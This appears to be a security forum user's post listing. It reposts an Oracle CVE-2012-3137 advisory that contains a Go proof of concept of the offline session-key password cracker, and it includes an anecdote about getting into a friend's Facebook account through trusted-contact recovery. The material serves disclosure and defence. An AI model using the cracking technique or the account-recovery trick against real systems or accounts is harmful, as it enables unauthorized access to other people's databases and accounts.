Nytro (Administrators): 18725 posts, 706 days won

Everything posted by Nytro

  1. Facebook pays well, but think about what/how much you could do with a SQL Injection or Remote Code/Command Execution...
  2. It's like the folk saying: "After you take a crap in the middle of the street, you also get slapped for it."
  3. The weird part is this: Adevarul said in their article that in the past this guy worked as a taxi driver.
  4. "The most wanted hacker in the world"
  5. Five products offered free by Ashampoo – Limited promotion. By Radu FaraVirusi(com) on January 20, 2014. Ashampoo offers 5 quality products with a completely free license. They are Ashampoo WinOptimizer 2013, Ashampoo Burning Studio 2013, Ashampoo Photo Commander 10, Ashampoo Snap 6 and Ashampoo SlideshowStudio 2013. Enjoy an optimized system, disc creation in any format, and sorting and arranging your favorite photos with the programs listed above. Use the link below to take advantage of the promotion: Your personal Ashampoo® gift. Source: Five products offered free by Ashampoo – Limited promotion
  6. Now that's more like it.
  7. Nytro

    Fun stuff

    I know, it's not fun, but it's useful.
  8. 30c3 - Mobile Network Attack Evolution
Description: Mobile networks should protect users on several fronts: calls need to be encrypted, customer data protected, and SIM cards shielded from malware. Many networks are still reluctant to implement appropriate protection measures in legacy systems. But even those who add mitigations often fail to fully capture attacks: they target symptoms instead of solving the core issue. This talk discusses mobile network and SIM card attacks that circumvent common protection techniques, to illustrate the ongoing mobile attack evolution. The evolution is exemplified by new advanced attack vectors against mobile communication and SIM cards: mobile calls and identities are known to be weakly protected, but networks progressively rolled out patches to defeat hacking tools. We will discuss, and release, tools to measure whether these changes are effective. SIM cards were identified as a remote exploitation risk this year: unnoticed by the victim, an attacker can take control over a card by sending a few binary SMS. Network operators started filtering binary SMS and patched some of their weak SIM card configurations in response to vulnerability research. The talk looks at filtering evasion techniques and discloses new configuration vulnerabilities present in many cards world-wide. For more information please visit: https://events.ccc.de/congress/2013/wiki/Main_Page
Source: 30c3 - Mobile Network Attack Evolution
  9. Romanian Cybercriminals Launch "Decebal" POS Malware Written in VBScript
January 18th, 2014, 09:53 GMT · By Eduard Kovacs

Researchers from IT security firm IntelCrawler have identified a new malware, dubbed "Decebal," that's designed to steal information from point-of-sale (POS) systems. The threat has been written in VBScript and the functional code is less than 400 lines.

Malware designed to target POS systems is becoming more and more popular, and the recent attacks aimed against Target, Neiman Marcus, and other US retailers demonstrate it. However, the Decebal malware, whose name stems from Decebalus, the king of Dacia, the historic region that today corresponds to Romania and Moldova, shows that such threats are constantly evolving.

What's interesting about Decebal is that it's capable of checking whether the computer on which it's deployed is running any sandboxing or reverse engineering software. It's also designed to validate payment card numbers.

"There was also found Track 2 validation software, used by bad actors to check received compromised data by issuing bank by the first 6 digits (BIN), which has some phrases and text strings in Romanian, pointing to the original roots of possible authors," IntelCrawler noted in its report.

For instance, when an error occurs in the Track 2 data validation process, the message "Esti beat?" is displayed in a pop-up. In Romanian, "Esti beat?" means "Are you drunk?" The strings "Select file" and "Validate" are also written in Romanian.

The Decebal POS malware was first released on January 3, 2014. The threat has a very compact command and control server that acts as a gate for receiving data stolen from POS machines.

"The code is pretty portable; a scripting language is a great advantage for easy infection of point-of-sale systems and is more flexible than binaries. This example shows that modern retailer environments can face such a threat and bad actors don't need to put in a lot of effort for it," explained Andrew Komarov, CEO of IntelCrawler.

14 hours ago, none of the antivirus engines on VirusTotal detected the threat. The sample was first checked on VirusTotal on January 12, but nothing has changed since then.

Source: Romanian Cybercriminals Launch "Decebal" POS Malware Written in VBScript
  10. Nytro

    PayPal Exchange

    Whose PayPal account are you offering from? Suggestion: don't do the exchange with him yet, I'm waiting for him to answer my question.
  11. Nytro

    Fun stuff

  12. Jailed terrorist gets extra time for refusing to divulge USB stick password
by Lisa Vaas on January 17, 2014

A British man already in jail for terrorist activity was given another four months for refusing to give police the password to a memory stick that they couldn't crack.

According to The Register, Judge Richard Marks QC sentenced Syed Hussain, 22, from Luton, for refusing to give up his password, contrary to section 53 of the Regulation of Investigatory Powers Act 2000 (RIPA), the UK's wiretapping law.

The encrypted memory stick had been seized from Hussain's home during an April 2012 counter-terrorism operation. Hussain and three other men were jailed in 2012 after they admitted to discussing an attack on a local Territorial Army base headquarters. They had planned to send a homemade bomb to their targeted site via a remote controlled toy car, but the men were arrested before the attack could be carried out.

Hussain's lawyers insisted that he couldn't remember the password to the memory stick, citing stress as the cause of his memory lapse. He kept up the "I forgot because I'm so stressed" argument for 11 months. During that time, police called in experts from GCHQ, the government's intelligence agency, but even they couldn't get at the stick's contents.

So police and prosecutors set a deadline: they gave Hussain until last January to cough up the password. Then, 11 months after the deadline came and went, police told the convicted man's lawyers that they'd launched a fresh investigation: this one into alleged credit card fraud by Hussain.

That seemed to jolt Hussain's memory. Within days, he handed over the password. It was "$ur4ht4ub4h8", which the Register reports is a play on words relating to a chapter of the Koran.

When police used the password to unlock the contents of the memory stick, they found it held information relevant to the investigation into alleged fraud, but nothing relating to terrorism or national security.

Source: Jailed terrorist gets extra time for refusing to divulge USB stick password | Naked Security
  13. SIE's recommendation to dignitaries: Please do not talk on mobile phones, especially abroad
The SIE's recommendation to Romanian dignitaries is not to talk on ordinary mobile phones, especially when abroad, and to use the communication lines at Romanian diplomatic missions instead.

The director of the Foreign Intelligence Service (SIE), Teodor Melescanu, stated on Digi 24, while commenting on the scandal triggered by Edward Snowden's revelations, that 95% of all satellites declared to be "for study" are spy satellites. "Obviously there is eavesdropping. 95% of the satellites orbiting in outer space for the 'peaceful study of the Cosmos' are spy satellites. If the world got upset about that, it means it is childish. Ah, if the upset was about how it was possible for this to come out and so on, that is something else," said Melescanu.

The SIE director added that the problem is not intercepting messages but decrypting them. "Everything that is an audio or video signal and so on and goes out into the atmosphere is intercepted. Most of it, however, is encrypted, and the problem is whether you can decrypt it. But as for interception, it is intercepted. We do it too, and everyone does (...) Of course, if they are encrypted, you get to them with more difficulty. It means they have higher value," Teodor Melescanu pointed out.

Asked whether SIE also listens in on political decision-makers from other countries, the head of the institution answered: "No, but such signals often reach us too." The SIE chief specified that Romania, once it joined NATO, committed by treaty not to conduct operations on the territory of other states, "neither interception nor of any other kind."

On the other hand, Melescanu implied that Romanian decision-makers may have been listened to by foreign services, especially if they made calls from abroad on unencrypted phones. "Personally, I don't rule it out. Especially if they spoke from abroad on ordinary mobile phones, it is very possible (...) We make this recommendation to all beneficiaries: please do not talk on the mobile phone, especially if you are abroad, on a trip. Do you have something to discuss? There is an embassy, there are ways to communicate. Whether the beneficiary complies or not, of course that is his choice," Teodor Melescanu declared.

Source: SIE's recommendation to dignitaries: Please do not talk on mobile phones, especially abroad - Mediafax
  14. Yes. If you want to run tests on other accounts (other than your own), try from a "Private window" or do "Clear cookies" first.
  15. It's not exactly new, but it's not enough to change the password. I tried it a while ago on a friend's account and managed to get access by identifying 5 of her friends: I guessed about 3 + about 2 that I knew. Someone else had changed her password using the same method and I recovered her account. I tried again today and found 2 options: 1. It sends a code to 3 people and you have to obtain those codes 2. Answer the security question. It may work under certain conditions, but the chances are fairly small.
  16. Use this SSL Converter to convert SSL certificates to and from different formats such as pem, der, p7b, and pfx. Different platforms and devices require SSL certificates to be converted to different formats. For example, a Windows server exports and imports .pfx files while an Apache server uses individual PEM (.crt, .cer) files. To use the SSL Converter, just select your certificate file and its current type (it will try to detect the type from the file extension) and then select what type you want to convert the certificate to and click Convert Certificate. For more information about the different SSL certificate types and how you can convert certificates on your computer using OpenSSL, see below. https://www.sslshopper.com/ssl-converter.html
  17. Antivirus Evasion: Lessons Learned – thelightcosine Derbycon 2013
Description: Over the past year, the speaker has spent a lot of time talking with people in the infosec community and doing research on antivirus evasion techniques, learning what works and what doesn't. There are a lot of good ideas floating around out there. In this talk we're going to pull those ideas all together. We'll discuss the basics of the AV evasion problem, what techniques work, which ones don't, and why. The talk will have a particular focus on AV evasion as it relates to Metasploit payloads.
Bio: David "thelightcosine" Maloney is a Senior Software Engineer on the Metasploit team at Rapid7. Before that he was a penetration tester for some large corporations, specializing in web applications, and was a longtime contributor to the Metasploit Framework. He is a member of the Corelan Security Team, and sort of an auxiliary member of the FALE locksport group. He is one of the founders of Hackerspace Charlotte in NC.
Source: Antivirus Evasion: Lessons Learned – thelightcosine Derbycon 2013 (Hacking Illustrated Series InfoSec Tutorial Videos)
  18. How to "open" a microchip and what's inside?
Microchips can indeed be considered a black box: as long as it's working you normally don't look inside. But what if you want to? Today we'll show how to "open" chips and what's inside.

WARNING! All operations with concentrated (and especially hot) acids are extremely dangerous. Only trained persons should work with them, using the required protective equipment (acid-proof gloves, protective glasses, protective suit, fume hood and more). Remember that you only have 2 eyes! This article is for educational purposes only; do not try to repeat it.

Opening microchips
Take some microchips of interest and add concentrated sulfuric acid. The container should be closed, but not airtight, so that fumes can escape (that is extremely important). Heat it to boiling temperature (300 °C). The white substance at the bottom is baking soda; it's there to neutralize accidental spills and part of the fumes. After 30-40 minutes, the acid "burns" the plastic to carbon. After it cools down, we can sort what is ready for the next step and what needs another acid bath (thick, bulky packages usually need 2-3 rounds). If pieces of carbon are stuck to the microchip itself and cannot be removed mechanically, they can be removed in hot concentrated nitric acid (the temperature is much lower, ~110-120 °C).

Taking a look
Images are clickable (beware of 5-25 MB JPEGs). Colors are enhanced; in reality they are much less saturated.

PL2303HX: USB<>RS232 converter; chips like this are used in Arduino-like boards, for example.
LM1117: low-dropout linear regulator.
74HC595: 8-bit shift register.
NXP 74AHC00: quad 2-input NAND gate. This is a nice example that "old" tech nodes (1 µm and older) are still in use. Also note how many spare vias there are, for improved yield.
Micron MT4C1024: 1 mebibit (2^20 bit) dynamic RAM. Widely used in 286- and 386-era computers, early 90's. Die size: 8662x3969 µm.
AMD PALCE16V8H: a GAL, a 32x64 array of AND elements. GAL (Generic Array Logic) chips are the grandfathers of FPGAs and CPLDs. Die size: 2434x2079 µm, 1 µm technology.
ATtiny13A: one of the smallest Atmel microcontrollers: only 1 KB of flash and 64 bytes of SRAM. The die size, though, turned out to be unexpectedly big (1620x1640 µm). 500 nm technology node.
ATmega8: one of the most popular 8-bit microcontrollers. Die size: 2855x2795 µm, technology node 500 nm.
KR580IK80A (later renamed KR580VM80A): one of the most widespread Soviet processors. Contrary to popular belief, it turned out not to be an Intel 8080A (or 8080) clone but a code-compatible redesign (while several parts are quite similar, the routing is different, as is the pad placement). Thinnest lines are 6 µm.
STM32F100C4T6B: the smallest microcontroller made by STMicroelectronics based on the ARM Cortex-M3 core. Die size: 2854x3123 µm.
Altera EPM7032: a CPLD that has seen a lot... One of the last using a 5 V supply. Die size: 3446x2252 µm, technology node 1 µm.
MIFARE chip, used in Moscow subway RFID tickets. Die size: 640x620 µm.

Now the black box is open. Follow us on Twitter @Zeptobars or subscribe to our RSS feed; we'll continue opening chips.
Source: How to «open» microchip and what's inside? : ZeptoBars
  19. Oracle Database 11g stealth password cracking vulnerability in logon protocol (CVE-2012-3137)
Posted February 20, 2013 by TeamSHATTER Admin

The vulnerability I will describe in this blog post has some aspects that make it especially noteworthy, all derived from the fact that the issue lies in a critical portion of the authentication protocol. The vulnerability can be exploited in a stealthy way and goes undetected, because all the attacker needs is information that the server sends freely as part of a normal authentication process. In addition, the vulnerability is so intimately part of the authentication protocol that it couldn't be fixed without requiring an update of the client software; consequently, fixing the vulnerability required deprecating the affected protocol version and using older or newer versions.

There has been some back and forth with Oracle regarding the fix for this vulnerability from the moment I reported it in April 2010. In the second half of 2011, Oracle provided a fix in the latest patchset release, 11.2.0.3, and closed the issue, as the fix would be included in future releases. But there were some clear problems with this fix that concerned us. The fix was not enabled by default (it required configuration changes) and it was not going to be part of a Critical Patch Update, so there would be no fix for all existing supported affected releases. Fortunately, the story had a happy ending: Oracle decided to include a proper fix in the October 2012 CPU for all supported affected releases, with the fix enforced without the need for a configuration change. I will describe later how to protect a system from this vulnerability, by applying the fixes provided by Oracle and also a few workarounds for those that are not able to apply the fixes at this time, but first let's go over the details of the vulnerability to understand where the problem lies and how risky it is.

Overview of the vulnerability

The Oracle Logon protocol is the native authentication mechanism that Oracle Database provides to authenticate its database users. As part of the initial process during the authentication, the client sends the username to be authenticated to the server, which then responds with a random Session Key and the password salt of the user. There is a flaw in the way this Session Key, a critical component of the protocol, is protected. This flaw allows an attacker to apply password cracking techniques to guess the correct password of the user. All the attacker needs is a Session Key and the salt, which are freely sent by the database server to anyone requesting a connection, prior to the authentication taking place. It is important to note that the attacker only needs to start the normal authentication process to obtain this Session Key, so the server can't differentiate an attacker from a genuine user connection.

Who is vulnerable?

Oracle Database servers using logon protocol version 11 (i.e. based on SHA-1 password hashes). This includes releases 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2 and 11.2.0.3 (unless protocol version 12 is required) on all platforms. Releases 10.2.0.X are vulnerable only if Enterprise User Security (EUS) is used and the directory has SHA-1 password verifiers generated.

All database users that are authenticated by the database (users identified by password) are susceptible to this attack. This excludes external users, such as OS users, which are not authenticated by the database. Specifically, this vulnerability affects database user accounts using SHA-1-based password hashes for authentication. Accounts with SHA-1-based password verifiers appear as "11G" in the PASSWORD_VERSIONS column of the DBA_USERS view. Database user accounts using exclusively a DES-based password verifier ("10G") for authentication are unaffected.

Who can exploit the vulnerability?

Anyone who has network access to the database server can exploit the vulnerability; no authentication is required. The attacker only needs to know the service name or SID of the database and a username that is authenticated using a password. For example, the highly privileged SYS user is a good attack target.

What can an attacker do?

A remote attacker can perform a stealthy offline password brute-force attack for a given username. No audit trail is left on the server for an invalid login attempt. The time it takes to crack the password depends on the strength of the password (length, complexity, character set used, etc.) and the processing power of the attacker. For example, on current mainstream CPUs it is possible to crack an 8-character lower-case alphabetic password in approximately 5 hours. For more complex passwords, attackers can use dictionary or hybrid approaches with high-end GPUs, which have a lot more processing power for cracking passwords than standard CPUs. The effort is equivalent to brute-forcing a known password hash and salt.

Vulnerability details

Now I would like to describe in more detail where the vulnerability resides. As I mentioned earlier, during the initial phase of the authentication sequence, the client sends the username of the authenticating user to the server, which responds with a random Session Key and the password salt. This Session Key is a random value that will be used to protect the password that is sent by the client. It is encrypted using the AES block cipher with the key being the password hash for the user (stored in the SYS.USER$ table or the password file) and using PKCS7 padding. The use of PKCS7 padding is the major design flaw in this implementation. The encrypted Session Key that is sent by the server is 48 bytes long, but when decrypted (with the padding removed) it is 40 bytes long. This padding is a fixed sequence of bytes that is automatically removed on decryption by the padding algorithm, a technique often used in conjunction with block ciphers like AES when the sequence of bytes to be encrypted is not a multiple of the block size (16 bytes for AES). If the Session Key is decrypted without removing the padding, we find that all Session Keys end with a sequence of eight bytes with the value 0x08 when the correct password hash is used as the key.

E_sk = AES_192_CBC(sk || {0x08}*8, key = Password Hash)

sk (40 bytes long): the Session Key generated by the server.
E_sk (48 bytes long): the Session Key generated by the server (sk), encrypted with the AES cipher using the password hash as the key and PKCS7 padding. This is what the server sends to the client.

Knowing this, it is possible to verify any candidate password and determine whether it is the correct one by calculating its hash and using it to decrypt the Session Key. If the result ends with the above 8-byte padding, then the password is correct. To be precise, the probability that it is the correct password is 1 - 1/2^64, which means there may be 1 false positive in every ~10^19 tries. This is a very large number, and if we want to be sure that this is not a false positive we can double-check with another Session Key. This reduces the chance of a false positive to about 1 in 10^38, which is negligible.

In short, the problem is the use of PKCS7 padding to protect the Session Key that is encrypted using the password hash. A proper implementation would have used random data for the remaining bytes of the block; this is the fix implemented in logon protocol version 12. The fixed padding provides a way to link a Session Key with the password hash. The attack is stealthy because the Oracle Database server can't differentiate a genuine authentication attempt from an attacker trying to get a Session Key for brute-forcing.
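The padding check described above, written out as an added example in Go; this is not TeamSHATTER's or Oracle's code. It simulates both sides of the exchange: a server that produces E_sk under protocol version 11 (40-byte session key plus a fixed eight-byte 0x08 PKCS7 tail) and under version 12 (random tail), and an attacker who runs a word list offline against one captured E_sk and salt without ever sending a password. The post does not specify the key derivation or the IV, so the example assumes hash = SHA-1(password || salt), the 20-byte hash zero-padded to the 24-byte key AES-192 needs, an all-zero IV, and a constructed 10-byte salt and word list.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha1"
	"fmt"
)

// Sizes from the post: the server's session key is 40 bytes and the
// encrypted blob it sends (E_sk) is 48 bytes, i.e. three AES blocks.
const (
	sessKeyLen = 40
	eSkLen     = 48
)

// verifierKey derives the AES-192 key from the 11g password verifier.
// The post only says "key = Password Hash" (SHA-1 based). Assumed here:
// hash = SHA-1(password || salt), and the 20-byte hash is right-padded
// with four zero bytes to the 24 bytes AES-192 requires.
func verifierKey(password, salt []byte) []byte {
	h := sha1.Sum(append(append([]byte{}, password...), salt...))
	key := make([]byte, 24)
	copy(key, h[:])
	return key
}

// cbc runs AES-CBC in one direction over whole blocks. An all-zero IV is
// assumed (the post does not state the IV).
func cbc(key []byte, encrypt bool, in []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	iv := make([]byte, aes.BlockSize)
	out := make([]byte, len(in))
	if encrypt {
		cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, in)
	} else {
		cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, in)
	}
	return out
}

// serverSessKeyV11 models vulnerable logon protocol version 11: the 40-byte
// session key is PKCS#7-padded with eight 0x08 bytes before encryption.
func serverSessKeyV11(sk, password, salt []byte) []byte {
	padded := append(append([]byte{}, sk...), bytes.Repeat([]byte{0x08}, 8)...)
	return cbc(verifierKey(password, salt), true, padded)
}

// serverSessKeyV12 models the protocol version 12 fix: the trailing eight
// bytes are random, so a decryption under a guessed key has nothing fixed
// to compare against.
func serverSessKeyV12(sk, password, salt []byte) []byte {
	padded := make([]byte, eSkLen)
	copy(padded, sk)
	if _, err := rand.Read(padded[sessKeyLen:]); err != nil {
		panic(err)
	}
	return cbc(verifierKey(password, salt), true, padded)
}

// guessIsCorrect is the attacker's offline oracle: decrypt E_sk under the
// key derived from a candidate password and look for the fixed PKCS#7 tail.
// A wrong key yields a random-looking tail, matching with probability 2^-64.
func guessIsCorrect(eSk, guess, salt []byte) bool {
	if len(eSk) != eSkLen {
		return false
	}
	plain := cbc(verifierKey(guess, salt), false, eSk)
	return bytes.Equal(plain[sessKeyLen:], bytes.Repeat([]byte{0x08}, 8))
}

// crack walks a word list against one captured E_sk and salt. Nothing is
// sent to the server, which is why the attack leaves no audit trail.
func crack(eSk, salt []byte, candidates []string) (string, bool) {
	for _, c := range candidates {
		if guessIsCorrect(eSk, []byte(c), salt) {
			return c, true
		}
	}
	return "", false
}

func main() {
	salt := []byte("0123456789") // constructed 10-byte salt
	sk := make([]byte, sessKeyLen)
	if _, err := rand.Read(sk); err != nil {
		panic(err)
	}
	words := []string{"oracle", "manager", "Welcome1"} // constructed word list
	pw, ok := crack(serverSessKeyV11(sk, []byte("Welcome1"), salt), salt, words)
	fmt.Println("protocol 11:", pw, ok)
	pw, ok = crack(serverSessKeyV12(sk, []byte("Welcome1"), salt), salt, words)
	fmt.Println("protocol 12:", pw, ok)
}
```

Against the version 11 blob the word list hits "Welcome1"; against the version 12 blob the same word list finds nothing, because the decrypted tail under the right key is random rather than 0x08*8. A real cracker would feed hashcat-style candidate generation into guessIsCorrect and confirm any hit against a second captured E_sk, as the post suggests.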
Also, as the attacker can stop the authentication process before sending a password, the authentication is never completed, therefore the native database auditing won’t record any trace of the intrusion. How to protect Limiting the network accessibility of the Oracle Database server is a good starting point to reduce exposure to potential attackers. This can be done using a network firewall or by setting node checking in SQLNET.ORA file (the settings are TCP.VALIDNODE_CHECKING, TCP.EXCLUDED_NODES and TCP.INVITED_NODES). History of the fixes TeamSHATTER reported this vulnerability to Oracle on April 21, 2010. One year and a half later, the vulnerability was fixed by releasing a new logon protocol version 12 as part of patchset 11.2.0.3 (both at client and server level). Logon protocol version 12 is no longer susceptible to this vulnerability because the padding in the Session Key is filled with random data instead of a fixed value, thus making impossible to determine if the password hash is correct or not when decrypting it. The problem with this initial fix was that the server by default was still vulnerable because the older vulnerable version 11 of the logon protocol was still allowed, most probably for backward compatibility with clients older than 11.2.0.3. To stop being vulnerable it was required to set SQLNET.ALLOWED_LOGON_VERSION equal to 12. This way only logon protocol version 12 was allowed on the server. However, this configuration change required that all client software also be upgraded to 11.2.0.3, to support the new version of the protocol. This requirement to upgrade all client software was another problem with this fix that made it very difficult to implement. Oracle closed the issue after providing this fix and told TeamSHATTER that the fix would not be included in a future Critical Patch Update. In this way the vulnerability would continue to be exploitable for most of the affected databases. 
Fortunately Oracle changed their mind and decided to provide a proper fix in October 2012 Critical Patch Update for all supported affected releases (not only 11.2.0.3). This time the fix is enforced by default because logon protocol version 11 is no longer allowed on the server, without the need of a configuration change. Also the fix doesn’t require a client software upgrade (there are some exceptions noted in the following section) because protocol version 10 is also allowed and clients that don’t support version 12 are automatically downgraded to version 10. In the following sections I will describe how to protect from this vulnerability. First I will explain what fixes can be installed to address the vulnerability and then I will go over some workarounds that can be applied for those that can’t install the patches right now. IMPORTANT NOTE: Make sure to test any configuration change on a test environment before implementing it on production systems. Apply October 2012 Critical Patch Update The October 2012 CPU contains fixes for this vulnerability. Oracle fixed the vulnerability by forbidding the use of logon protocol version 11 in the Oracle Database server. After applying the CPU the server will exclusively use earlier versions of the protocol, like 10 or the new version 12. It is important to understand that ending the use of logon protocol version 11, enforced by applying the CPU, could impact the ability of some clients to connect to the database server. Thus it is important to spend some time before applying the CPU to analyze if your database users or applications will be impacted by this or not. First of all, if the CPU is going to be applied to all clients before applying the CPU to the server, or all clients are release 11.2.0.3, then there is nothing to worry about because those clients support protocol version 12. The compatibility issues arise when there is no way for a client to communicate using protocol versions other than 11, like 10 or 12. 
If the client does not support logon protocol version 12, then version 10 will be used. If the Server does not have 10g verifiers (hashes), maybe because it is configured to only allow protocol version 11 (and above), then there is no way for the client to authenticate. If your sqlnet.ora file (located by default at {ORACLE_HOME}/network/admin) contains the line SQLNET.ALLOWED_LOGON_VERSION=11 then there is significant chance that users will be affected by applying the CPU. Running the following query will determine the user accounts that do not have 10g version verifiers: SELECT username FROM dba_users WHERE nvl(PASSWORD,'X') <> 'EXTERNAL' AND nvl(PASSWORD,'X') <> 'GLOBAL' AND password_versions NOT LIKE '%10G%'; See the Patching for CVE-2012-3137 [iD 1493990.1] document available at Oracle Support for more information on how to determine if the clients will be affected by applying the CPU. The use of logon protocol version 10 and consequently the use of DES-based password verifiers may not be adequate for some customer’s security compliance requirements. These customers may be forced to work exclusively with protocol version 12 that uses the SHA-1 passwords verifiers and contains a fix to the vulnerability described in this blog post. The following section explains this solution. Exclusive use of the new logon protocol version 12 (only compatible with client software higher than 11.2.0.3 or that has October 2012 CPU applied) This is the best way to fix this vulnerability, but it comes with some requirements that may be difficult to fulfill. This is the ideal solution because there is no need to fall back to logon protocol version 10 and lose all the security improvements introduced in version 11, like case sensitive passwords and SHA-1 salted password hashes. Implementing this protection requires to have client software that supports logon protocol version 12. 
The clients that support this protocol version are release 11.2.0.3 (or higher) and also clients with October 2012 (or later) CPU applied. Once the server and all clients have been upgraded, apply October 2012 CPU to the Oracle Database Server (not needed if the server is release 11.2.0.3 or higher) and configure the server to allow only logon protocol version 12. Add (or edit) the following line in the sqlnet.ora file (located at ORACLE_HOME/network/admin):

SQLNET.ALLOWED_LOGON_VERSION=12

Oracle Database Server release 11.2.0.3 already has support for logon protocol version 12, even if the October 2012 CPU is not applied, but to stop being vulnerable it is required to set SQLNET.ALLOWED_LOGON_VERSION=12.

IMPORTANT NOTE: After this configuration change is implemented, Oracle clients that don't support logon protocol 12 (currently client versions lower than 11.2.0.3 without the October 2012 CPU applied) will not be able to connect to the server.

The following sections contain information on workarounds to protect from this vulnerability for those who are unable to apply patches at this moment.

Workaround 1: Implement strong password policies

This workaround poses some difficult questions. How long and complex should a password be in order to be certain that no attacker can crack it in reasonable time? How long should the lifetime of a password be so that the attacker can't crack it during that period? These questions are difficult to answer because we don't know the resources that the attacker possesses. Password cracking techniques are advancing quickly and what seems secure today can be insecure tomorrow. In general a password longer than 12 characters (using the full character set: numbers, lower and upper case and special characters) and not derived from a dictionary word is considered secure. In addition to password complexity, it is also important that the password expiration is set to 90 days or less.

A strong password policy can be enforced by the use of Oracle Profiles. After the password policy is modified, organizations must require users to change passwords to conform to the new requirements. Keep in mind that this workaround does not eliminate the vulnerability; instead the idea is to make an attack impractical by having passwords so difficult to crack that they can't be compromised during their restricted lifetime.

Workaround 2: Use external authentication

Users authenticated by external means (not by the Database) do not have a password hash stored in the database and consequently are not affected by this vulnerability. This includes users authenticated by the Operating System and the Network (SSL or third parties like Kerberos). See Configuring Authentication for more information on implementing these authentication methods.

Workaround 3: Disable protocol version 11 and use version 10 or lower (SEC_CASE_SENSITIVE_LOGON = FALSE)

Protocol version 10 or lower is not vulnerable to this attack. Oracle by default keeps two different hashes for each password, a DES based hash for version 10 and lower and the SHA-1 based hash for version 11. This workaround has been divided into separate steps for better understanding. All steps are required. Step 2a must be completed first. Steps 2b and 2c can be completed subsequently in any order. Step 2b protects regular users. Step 2c protects administrative users (users granted SYSDBA, SYSOPER or SYSASM).

Step 2a) Before implementing this workaround we must ensure that all users authenticated by passwords will be able to connect using protocol version 10. To verify this we need to make sure that the SQLNET.ALLOWED_LOGON_VERSION setting in the sqlnet.ora file is not present, or if it is present it is set to 10 or lower. We also need to make sure that all users authenticated by passwords have a version 10 password hash. The following SQL query (when executed as SYS) lists all the users which are missing 10g hashes:

SELECT username FROM dba_users WHERE nvl(PASSWORD,'X') <> 'EXTERNAL' AND nvl(PASSWORD,'X') <> 'GLOBAL' AND password_versions NOT LIKE '%10G%';

If this query returns any rows, the users listed must change passwords in order to generate proper version 10 DES based hashes.

Step 2b) The next step is to change the SEC_CASE_SENSITIVE_LOGON initialization parameter to FALSE, so that 11g authentication is not available and 10g or lower is used (which is not vulnerable to this attack). Execute the following SQL:

ALTER SYSTEM SET SEC_CASE_SENSITIVE_LOGON = FALSE;

Step 2c) SYSDBA, SYSOPER and SYSASM users are authenticated remotely using the password file instead of the hash in the SYS.USER$ table, thus the password file needs to be recreated. After successfully recreating the password file, only the SYS user will be present, so for any other users with SYSDBA, SYSOPER or SYSASM privileges granted on the database, you must GRANT the SYSDBA/SYSOPER/SYSASM privilege again to add them to the new password file. To get the list of SYSDBA/SYSOPER/SYSASM users currently present in the password file execute the following query:

SELECT * FROM V$PWFILE_USERS;

Rename the current password file or move it to another location. The location of the password file is {ORACLE_HOME}/dbs/orapw{SID} for Unix/Linux, or {ORACLE_HOME}\database\PWD{SID}.ora for Windows. Next, use the orapwd utility to create a password file that uses the 10g password hash. This can be done by specifying the parameter ignorecase=y so that a version 10 case insensitive password is used. You will be asked for the SYS password.

orapwd file={password_file_location} ignorecase=y

After this only the SYS user will be present in the password file. If you want other users to have SYSDBA, SYSOPER or SYSASM privileges you need to grant them now by using the GRANT SYSDBA/SYSOPER/SYSASM TO … statement.

Conclusion

After reading this blog post, I hope you will be convinced that this is a serious issue that requires immediate attention. If patching is not an option at this moment, one of the workarounds should be implemented to minimize the risk of exposure to this vulnerability.

Sursa: Oracle Database 11g stealth password cracking vulnerability in logon protocol (CVE-2012-3137) | TeamSHATTER
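As an added example (not part of the TeamSHATTER post above), this is how Workaround 1 can be put in place with an Oracle profile, followed by the checks a DBA would run before switching to Workaround 3. The profile name cve_2012_3137_mitigation, the user app_user and the lockout limits are assumptions chosen for illustration; the 90-day lifetime and the "missing 10G hash" query come from the post. The complexity function used is the sample verify_function_11G that Oracle ships in $ORACLE_HOME/rdbms/admin/utlpwdmg.sql.

```sql
-- Added example, not code from the original post.
-- Run as SYS (or a user with CREATE PROFILE and ALTER USER).

-- 1. Load Oracle's sample password complexity function. In 11g this script
--    creates verify_function_11G. Note that it also ALTERs the DEFAULT profile,
--    so review it before running it on a production instance.
@?/rdbms/admin/utlpwdmg.sql

-- 2. Profile implementing Workaround 1: 90-day lifetime as recommended in the
--    post, plus reuse and lockout limits (assumed values) so that online
--    guessing is throttled as well as offline cracking made impractical.
CREATE PROFILE cve_2012_3137_mitigation LIMIT
  PASSWORD_LIFE_TIME       90      -- days, per the post's recommendation
  PASSWORD_GRACE_TIME      7       -- days of warnings before lockout
  PASSWORD_REUSE_TIME      365     -- days before a password may be reused
  PASSWORD_REUSE_MAX       10      -- distinct passwords before reuse
  FAILED_LOGIN_ATTEMPTS    5
  PASSWORD_LOCK_TIME       1/24    -- one hour (expressed in days)
  PASSWORD_VERIFY_FUNCTION verify_function_11G;

-- 3. Attach the profile to each password-authenticated account and expire the
--    current password so the new rules apply at next logon (app_user is a
--    placeholder account name).
ALTER USER app_user PROFILE cve_2012_3137_mitigation;
ALTER USER app_user PASSWORD EXPIRE;

-- 4. Pre-checks for Workaround 3. Accounts returned here have no 10G hash and
--    would be locked out once SEC_CASE_SENSITIVE_LOGON is set to FALSE
--    (same condition as the query in the post).
SELECT username, password_versions
  FROM dba_users
 WHERE nvl(password, 'X') NOT IN ('EXTERNAL', 'GLOBAL')
   AND password_versions NOT LIKE '%10G%';

-- Current value of the parameter Workaround 3 changes.
SELECT name, value
  FROM v$parameter
 WHERE name = 'sec_case_sensitive_logon';

-- Administrative users that must be re-granted after the password file is
-- recreated with orapwd ... ignorecase=y (step 2c of the post).
SELECT username, sysdba, sysoper, sysasm FROM v$pwfile_users;
```

Two caveats a practitioner should keep in mind: as shipped, verify_function_11G only enforces a minimum of 8 characters, so meeting the 12-character guidance in the post requires a custom PL/SQL verify function referenced from the profile; and, as the post says, none of this removes the exposed hash, it only shortens the window in which a cracked password is useful.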
20. Python tools for penetration testers

If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest to try out the Python programming language. It has a rich set of useful libraries and programs. This page lists some of them.

Most of the listed tools are written in Python, others are just Python bindings for existing C libraries, i.e. they make those libraries easily usable from Python programs.

